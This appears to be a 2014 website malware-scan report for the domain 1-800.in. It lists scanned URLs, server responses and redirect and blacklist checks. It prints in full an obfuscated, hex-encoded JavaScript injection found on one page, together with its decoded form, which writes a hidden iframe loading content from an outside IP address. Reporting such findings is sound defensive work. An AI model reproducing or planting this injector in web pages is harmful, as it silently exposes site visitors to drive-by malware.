Scanned pages/files
Request | Server response | Status |
http://www.1-800.in/mobile | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 17 Jul 2014 08:45:13 GMT Location: http://www.1-800.in/mobile/ Server: Apache Content-Length: 297 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.1-800.in/mobile/ | 500 Internal Server Error Content-Length: 1902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function v476393dd1508b(v476393dd15884){ return(parseInt(v476393dd15884,16));}function v476393dd17080(v476393dd17883){ var v476393dd19063=2; var v476393dd18076='';for(v476393dd188c3=0; v476393dd188c3<v476393dd17883.length; v476393dd188c3+=v476393dd19063){ v476393dd18076+=(String.fromCharCode(v476393dd1508b(v476393dd17883.substr(v476393dd188c3, v476393dd19063))));}return v476393dd18076;} document.write(v476393dd17080('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D34366562663436633761207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3833393730292B276262366130386334626165365C272077696474683D333131206865696768743D323730207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=46ebf46c7a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*83970)+'bb6a08c4bae6\' width=311 height=270 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url <iframe src='http://url' width='1' height='1' style='visibility: hidden;'> | ||
http://www.1-800.in/test404page.js | 404 Not Found Content-Length: 954 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 1-800.in
Result:
GET / HTTP/1.1
Host: 1-800.in
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1-800.in
Referer: http://www.google.com/search?q=1-800.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 1-800.in
Referer: http://www.google.com/search?q=1-800.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=1-800.in
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1-800.in/
Result: 1-800.in is not infected or malware details are not published yet.
Result: 1-800.in is not infected or malware details are not published yet.